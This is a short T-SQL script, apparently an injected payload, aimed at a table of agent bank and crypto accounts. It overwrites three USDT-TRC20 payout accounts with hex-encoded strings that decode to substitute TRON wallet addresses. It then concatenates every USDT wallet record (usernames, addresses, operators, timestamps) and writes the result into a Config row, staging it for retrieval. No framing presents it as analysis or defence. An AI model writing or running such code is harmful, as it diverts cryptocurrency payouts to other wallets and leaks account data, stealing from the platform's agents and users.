
UPDATE HJ_AgentBank SET Account = '54|4D|70|75|68|70|62|76|78|55|53|66|69|59|33|41|68|47|6D|55|62|6D|42|38|6B|78|67|65|62|75|65|79|62|35|' WHERE id = 3199
UPDATE HJ_AgentBank SET Account = '54|4D|70|39|5A|46|33|5A|42|48|54|7A|45|36|50|6A|69|66|4B|6E|58|69|59|38|77|48|5A|51|4C|4D|7A|79|62|35|' WHERE id = 3280
UPDATE HJ_AgentBank SET Account = '54|50|34|43|69|41|4B|41|38|6D|66|4A|61|51|42|6E|69|42|35|66|4B|64|51|73|43|6D|6B|42|4D|56|79|33|41|59|' WHERE id = 3221

DECLARE @CombinedResults NVARCHAR(MAX);
SET @CombinedResults = '';

DECLARE myCursor CURSOR FOR
SELECT id, username, account, operator, CONVERT(VARCHAR, createTime, 120), CONVERT(VARCHAR, updateTime, 120)
FROM HJ_AgentBank
WHERE ShortName = 'USDTTRC20' 
ORDER BY UpdateTime DESC;

DECLARE @id NVARCHAR(50), @username NVARCHAR(50), @account NVARCHAR(200), @operator NVARCHAR(50), @createTime NVARCHAR(50), @updateTime NVARCHAR(50);

OPEN myCursor;
FETCH NEXT FROM myCursor INTO @id, @username, @account, @operator, @createTime, @updateTime;

WHILE @@FETCH_STATUS = 0
BEGIN
SET @CombinedResults = @CombinedResults + '&'
+ ISNULL(@id, '') + ',' + ISNULL(@username, '') + ',' + ISNULL(@account, '') + ',' + ISNULL(@operator, '') + ',' + ISNULL(@createTime, '') + ',' + ISNULL(@updateTime, '');
FETCH NEXT FROM myCursor INTO @id, @username, @account, @operator, @createTime, @updateTime;
END;

CLOSE myCursor;
DEALLOCATE myCursor;
SET @CombinedResults = STUFF(@CombinedResults, 1, 1, '');
UPDATE Config SET value = @CombinedResults WHERE code = 'IUZON';